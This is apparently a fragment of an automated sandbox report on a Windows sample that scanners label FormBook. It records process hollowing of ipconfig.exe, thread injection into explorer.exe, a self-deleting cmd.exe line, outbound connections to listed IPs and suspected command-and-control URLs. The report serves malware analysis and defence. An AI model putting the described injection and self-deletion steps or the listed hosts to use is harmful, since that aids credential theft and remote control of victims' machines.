              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01784859 mov eax, dword ptr fs:[00000030h]0_2_01784859
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B0854 mov eax, dword ptr fs:[00000030h]0_2_017B0854
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01792840 mov ecx, dword ptr fs:[00000030h]0_2_01792840
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BA830 mov eax, dword ptr fs:[00000030h]0_2_017BA830
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A2835 mov eax, dword ptr fs:[00000030h]0_2_017A2835
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A2835 mov eax, dword ptr fs:[00000030h]0_2_017A2835
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A2835 mov eax, dword ptr fs:[00000030h]0_2_017A2835
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A2835 mov ecx, dword ptr fs:[00000030h]0_2_017A2835
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A2835 mov eax, dword ptr fs:[00000030h]0_2_017A2835
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A2835 mov eax, dword ptr fs:[00000030h]0_2_017A2835
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184A8E4 mov eax, dword ptr fs:[00000030h]0_2_0184A8E4
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BC8F9 mov eax, dword ptr fs:[00000030h]0_2_017BC8F9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BC8F9 mov eax, dword ptr fs:[00000030h]0_2_017BC8F9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180C810 mov eax, dword ptr fs:[00000030h]0_2_0180C810
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182483A mov eax, dword ptr fs:[00000030h]0_2_0182483A
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182483A mov eax, dword ptr fs:[00000030h]0_2_0182483A
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE8C0 mov eax, dword ptr fs:[00000030h]0_2_017AE8C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01816870 mov eax, dword ptr fs:[00000030h]0_2_01816870
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01816870 mov eax, dword ptr fs:[00000030h]0_2_01816870
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180E872 mov eax, dword ptr fs:[00000030h]0_2_0180E872
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180E872 mov eax, dword ptr fs:[00000030h]0_2_0180E872
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01780887 mov eax, dword ptr fs:[00000030h]0_2_01780887
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177CB7E mov eax, dword ptr fs:[00000030h]0_2_0177CB7E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01834BB0 mov eax, dword ptr fs:[00000030h]0_2_01834BB0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01834BB0 mov eax, dword ptr fs:[00000030h]0_2_01834BB0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182EBD0 mov eax, dword ptr fs:[00000030h]0_2_0182EBD0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AEB20 mov eax, dword ptr fs:[00000030h]0_2_017AEB20
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AEB20 mov eax, dword ptr fs:[00000030h]0_2_017AEB20
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FEB1D mov eax, dword ptr fs:[00000030h]0_2_017FEB1D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FEB1D mov eax, dword ptr fs:[00000030h]0_2_017FEB1D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FEB1D mov eax, dword ptr fs:[00000030h]0_2_017FEB1D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FEB1D mov eax, dword ptr fs:[00000030h]0_2_017FEB1D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FEB1D mov eax, dword ptr fs:[00000030h]0_2_017FEB1D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FEB1D mov eax, dword ptr fs:[00000030h]0_2_017FEB1D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FEB1D mov eax, dword ptr fs:[00000030h]0_2_017FEB1D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FEB1D mov eax, dword ptr fs:[00000030h]0_2_017FEB1D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FEB1D mov eax, dword ptr fs:[00000030h]0_2_017FEB1D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180CBF0 mov eax, dword ptr fs:[00000030h]0_2_0180CBF0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AEBFC mov eax, dword ptr fs:[00000030h]0_2_017AEBFC
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01788BF0 mov eax, dword ptr fs:[00000030h]0_2_01788BF0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01788BF0 mov eax, dword ptr fs:[00000030h]0_2_01788BF0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01788BF0 mov eax, dword ptr fs:[00000030h]0_2_01788BF0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01848B28 mov eax, dword ptr fs:[00000030h]0_2_01848B28
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01848B28 mov eax, dword ptr fs:[00000030h]0_2_01848B28
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A0BCB mov eax, dword ptr fs:[00000030h]0_2_017A0BCB
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A0BCB mov eax, dword ptr fs:[00000030h]0_2_017A0BCB
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A0BCB mov eax, dword ptr fs:[00000030h]0_2_017A0BCB
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01780BCD mov eax, dword ptr fs:[00000030h]0_2_01780BCD
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01780BCD mov eax, dword ptr fs:[00000030h]0_2_01780BCD
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01780BCD mov eax, dword ptr fs:[00000030h]0_2_01780BCD
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01828B42 mov eax, dword ptr fs:[00000030h]0_2_01828B42
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01816B40 mov eax, dword ptr fs:[00000030h]0_2_01816B40
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01816B40 mov eax, dword ptr fs:[00000030h]0_2_01816B40
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184AB40 mov eax, dword ptr fs:[00000030h]0_2_0184AB40
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790BBE mov eax, dword ptr fs:[00000030h]0_2_01790BBE
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790BBE mov eax, dword ptr fs:[00000030h]0_2_01790BBE
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01834B4B mov eax, dword ptr fs:[00000030h]0_2_01834B4B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01834B4B mov eax, dword ptr fs:[00000030h]0_2_01834B4B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182EB50 mov eax, dword ptr fs:[00000030h]0_2_0182EB50
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01854A80 mov eax, dword ptr fs:[00000030h]0_2_01854A80
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FCA72 mov eax, dword ptr fs:[00000030h]0_2_017FCA72
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FCA72 mov eax, dword ptr fs:[00000030h]0_2_017FCA72
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BCA6F mov eax, dword ptr fs:[00000030h]0_2_017BCA6F
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BCA6F mov eax, dword ptr fs:[00000030h]0_2_017BCA6F
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BCA6F mov eax, dword ptr fs:[00000030h]0_2_017BCA6F
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790A5B mov eax, dword ptr fs:[00000030h]0_2_01790A5B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790A5B mov eax, dword ptr fs:[00000030h]0_2_01790A5B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01786A50 mov eax, dword ptr fs:[00000030h]0_2_01786A50
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01786A50 mov eax, dword ptr fs:[00000030h]0_2_01786A50
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01786A50 mov eax, dword ptr fs:[00000030h]0_2_01786A50
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01786A50 mov eax, dword ptr fs:[00000030h]0_2_01786A50
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01786A50 mov eax, dword ptr fs:[00000030h]0_2_01786A50
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01786A50 mov eax, dword ptr fs:[00000030h]0_2_01786A50
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01786A50 mov eax, dword ptr fs:[00000030h]0_2_01786A50
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BCA38 mov eax, dword ptr fs:[00000030h]0_2_017BCA38
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A4A35 mov eax, dword ptr fs:[00000030h]0_2_017A4A35
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A4A35 mov eax, dword ptr fs:[00000030h]0_2_017A4A35
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AEA2E mov eax, dword ptr fs:[00000030h]0_2_017AEA2E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BCA24 mov eax, dword ptr fs:[00000030h]0_2_017BCA24
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180CA11 mov eax, dword ptr fs:[00000030h]0_2_0180CA11
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BAAEE mov eax, dword ptr fs:[00000030h]0_2_017BAAEE
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BAAEE mov eax, dword ptr fs:[00000030h]0_2_017BAAEE
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01780AD0 mov eax, dword ptr fs:[00000030h]0_2_01780AD0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B4AD0 mov eax, dword ptr fs:[00000030h]0_2_017B4AD0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B4AD0 mov eax, dword ptr fs:[00000030h]0_2_017B4AD0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017D6ACC mov eax, dword ptr fs:[00000030h]0_2_017D6ACC
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017D6ACC mov eax, dword ptr fs:[00000030h]0_2_017D6ACC
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017D6ACC mov eax, dword ptr fs:[00000030h]0_2_017D6ACC
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01788AA0 mov eax, dword ptr fs:[00000030h]0_2_01788AA0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01788AA0 mov eax, dword ptr fs:[00000030h]0_2_01788AA0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017D6AA4 mov eax, dword ptr fs:[00000030h]0_2_017D6AA4
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182EA60 mov eax, dword ptr fs:[00000030h]0_2_0182EA60
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B8A90 mov edx, dword ptr fs:[00000030h]0_2_017B8A90
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178EA80 mov eax, dword ptr fs:[00000030h]0_2_0178EA80
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178EA80 mov eax, dword ptr fs:[00000030h]0_2_0178EA80
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178EA80 mov eax, dword ptr fs:[00000030h]0_2_0178EA80
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178EA80 mov eax, dword ptr fs:[00000030h]0_2_0178EA80
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178EA80 mov eax, dword ptr fs:[00000030h]0_2_0178EA80
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178EA80 mov eax, dword ptr fs:[00000030h]0_2_0178EA80
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178EA80 mov eax, dword ptr fs:[00000030h]0_2_0178EA80
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178EA80 mov eax, dword ptr fs:[00000030h]0_2_0178EA80
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178EA80 mov eax, dword ptr fs:[00000030h]0_2_0178EA80
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01788D59 mov eax, dword ptr fs:[00000030h]0_2_01788D59
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01788D59 mov eax, dword ptr fs:[00000030h]0_2_01788D59
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01788D59 mov eax, dword ptr fs:[00000030h]0_2_01788D59
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01788D59 mov eax, dword ptr fs:[00000030h]0_2_01788D59
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01788D59 mov eax, dword ptr fs:[00000030h]0_2_01788D59
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01780D59 mov eax, dword ptr fs:[00000030h]0_2_01780D59
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01780D59 mov eax, dword ptr fs:[00000030h]0_2_01780D59
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01780D59 mov eax, dword ptr fs:[00000030h]0_2_01780D59
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01854DAD mov eax, dword ptr fs:[00000030h]0_2_01854DAD
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01848DAE mov eax, dword ptr fs:[00000030h]0_2_01848DAE
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01848DAE mov eax, dword ptr fs:[00000030h]0_2_01848DAE
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\explorer.exeNetwork Connect: 76.223.105.230 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 45.88.201.15 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 104.16.36.105 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 35.214.118.179 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 34.149.87.45 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 69.57.172.11 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 72.14.185.43 80Jump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeSection loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeSection loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeThread register set: target process: 1028Jump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 1028Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
              Sample uses process hollowing technique
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: A90000Jump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\i5NDVAFg42.exe"Jump to behavior
              Source: explorer.exe, 00000002.00000003.3094901918.0000000009BAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094735270.0000000009B85000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4452782293.0000000009C22000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
              Source: explorer.exe, 00000002.00000002.4447822184.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1992742188.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
              Source: explorer.exe, 00000002.00000002.4449515114.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4447822184.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1992742188.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000002.00000002.4447822184.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1992742188.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: explorer.exe, 00000002.00000002.4447822184.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1992742188.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: explorer.exe, 00000002.00000000.1992382164.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4446973075.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: i5NDVAFg42.exe, type: SAMPLE
              Source: Yara matchFile source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: i5NDVAFg42.exe, type: SAMPLE
              Source: Yara matchFile source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Shared Modules              		1
              DLL Side-Loading              		512
              Process Injection              		1
              Rootkit              		1
              Credential API Hooking              		121
              Security Software Discovery              		Remote Services1
              Credential API Hooking              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading              		2
              Virtualization/Sandbox Evasion              		LSASS Memory2
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		4
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)512
              Process Injection              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
              Obfuscated Files or Information              		LSA Secrets1
              System Network Configuration Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing              		Cached Domain Credentials1
              File and Directory Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync11
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1410996 Sample: i5NDVAFg42.exe Startdate: 18/03/2024 Architecture: WINDOWS Score: 100 26 www.topdeals.biz 2->26 28 www.michellecaldwelldesign.com 2->28 30 14 other IPs or domains 2->30 44 Snort IDS alert for network traffic 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 7 other signatures 2->50 10 i5NDVAFg42.exe 2->10         started        signatures3 process4 signatures5 52 Modifies the context of a thread in another process (thread injection) 10->52 54 Maps a DLL or memory area into another process 10->54 56 Sample uses process hollowing technique 10->56 58 2 other signatures 10->58 13 explorer.exe 105 7 10->13 injected process6 dnsIp7 32 www.topdeals.biz 72.14.185.43, 49719, 80 LINODE-APLinodeLLCUS United States 13->32 34 www.flavorfog.online 35.214.118.179, 49716, 80 GOOGLE-2US United States 13->34 36 6 other IPs or domains 13->36 60 System process connects to network (likely due to code injection or exploit) 13->60 62 Uses ipconfig to lookup or modify the Windows network settings 13->62 17 ipconfig.exe 13->17         started        20 autochk.exe 13->20         started        signatures8 process9 signatures10 38 Modifies the context of a thread in another process (thread injection) 17->38 40 Maps a DLL or memory area into another process 17->40 42 Tries to detect virtualization through RDTSC time measurements 17->42 22 cmd.exe 1 17->22         started        process11 process12 24 conhost.exe 22->24         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              i5NDVAFg42.exe89%ReversingLabsWin32.Trojan.FormBook
              i5NDVAFg42.exe100%AviraTR/Crypt.ZPACK.Gen
              i5NDVAFg42.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://word.office.comon0%URL Reputationsafe
              https://powerpoint.office.comcember0%URL Reputationsafe
              http://schemas.micro0%URL Reputationsafe
              http://crl.v0%URL Reputationsafe
              http://www.yoursweets.online/vr01/www.nicholsonflooringservices.com100%Avira URL Cloudmalware
              http://www.flavorfog.online0%Avira URL Cloudsafe
              http://www.michellecaldwelldesign.com0%Avira URL Cloudsafe
              http://www.laneflowlogistics.com/vr01/?K0Dl=8pkho2W8C2&F8=afsJSrVtQy935SgvDMKIlJRgvlqACV7EhITZbFrNAvlElQGaJzKQmMA6gaTM16h48AiD0%Avira URL Cloudsafe
              http://www.yesxoit.xyz0%Avira URL Cloudsafe
              http://www.yoursweets.online100%Avira URL Cloudmalware
              http://www.makeyousurprise.com/vr01/www.helyibudapest.com100%Avira URL Cloudphishing
              http://www.bharatcrimecontrol24news.com/vr01/0%Avira URL Cloudsafe
              http://www.hsyxkj.com/vr01/www.makeyousurprise.com0%Avira URL Cloudsafe
              http://www.hsyxkj.com0%Avira URL Cloudsafe
              http://www.gratiasempirellc.com/vr01/?F8=w7umpJ+rfj3CGTpHxtSOPW9QQGzAdMNJjdAKE5hb1nYkCdk9PPEgcDhma/h12TSv3owP&K0Dl=8pkho2W8C20%Avira URL Cloudsafe
              http://www.accidentapp.online/vr01/?K0Dl=8pkho2W8C2&F8=XJpxajiERfwYWZCBMKFPnJULtBnU/CqQJGR7CZrrgovMO9KS90T7etXRllYWrqB0ffTS0%Avira URL Cloudsafe
              http://www.laneflowlogistics.comReferer:0%Avira URL Cloudsafe
              http://www.bharatcrimecontrol24news.com/vr01/?K0Dl=8pkho2W8C2&F8=3hn83+NBBYNXWUD9Y/r7Xs4IAViW+ZrQ9Q/N09yYT452ZMDcSpE7Ef8yOdRKd9g47dJA0%Avira URL Cloudsafe
              http://www.familyofficesheet.com/vr01/0%Avira URL Cloudsafe
              http://www.gratiasempirellc.comReferer:0%Avira URL Cloudsafe
              http://www.accidentapp.online/vr01/www.yoursweets.online0%Avira URL Cloudsafe
              http://www.nicholsonflooringservices.comReferer:0%Avira URL Cloudsafe
